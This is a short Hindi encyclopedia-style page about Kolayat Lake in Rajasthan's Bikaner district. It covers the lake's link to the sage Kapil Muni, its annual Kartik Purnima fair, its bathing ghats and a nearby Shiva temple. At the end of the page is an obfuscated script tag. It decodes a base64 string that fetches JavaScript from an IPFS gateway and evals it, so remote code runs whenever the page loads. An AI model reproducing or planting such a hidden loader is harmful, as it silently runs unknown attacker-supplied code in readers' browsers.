कोलायत झील
भारत डिस्कवरी प्रस्तुति
रविन्द्र प्रसाद (चर्चा | योगदान) द्वारा परिवर्तित 06:53, 1 अप्रैल 2018 का अवतरण
कोलायत झील (अंग्रेज़ी: Kolayat Lake) भारतीय राज्य राजस्थान के बीकानेर ज़िले में स्थित है। यह मीठे पानी की झील है, जिसके समीप ही सांख्य दर्शन के प्रणेता कपिल मुनि का आश्रम है।
- इस झील के पास ही स्थित कपिल मुनि के आश्रम को 'राजस्थान का सुन्दर मरुउद्यान' कहा जाता है। यह आश्रम राष्ट्रीय राजमार्ग 15 पर स्थित है।
- कोलायत झील की उत्पत्ति कपिल मुनि ने अपनी माता की मुक्ति के लिए की थी।
- यहाँ कार्तिक मास की पूर्णिमा (नवम्बर माह) में मेला लगता है।
- झील में दीप जलाकर अर्पण किया जाता है। समीप ही यहाँ एक शिवालय है, जिसमें 12 शिवलिंग हैं।
- कोलायत झील में स्नान करना धार्मिक दृष्टि से पवित्र माना जाता है, इसलिये यहाँ लोगों का आना-जाना चलता रहता है। यहाँ नहाने के लिए अनेक घाट बने हुए हैं, जिनके चारों ओर पीपल के वृक्ष हैं।
|
|
|
|
|
टीका टिप्पणी और संदर्भ
बाहरी कड़ियाँ
संबंधित लेख
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>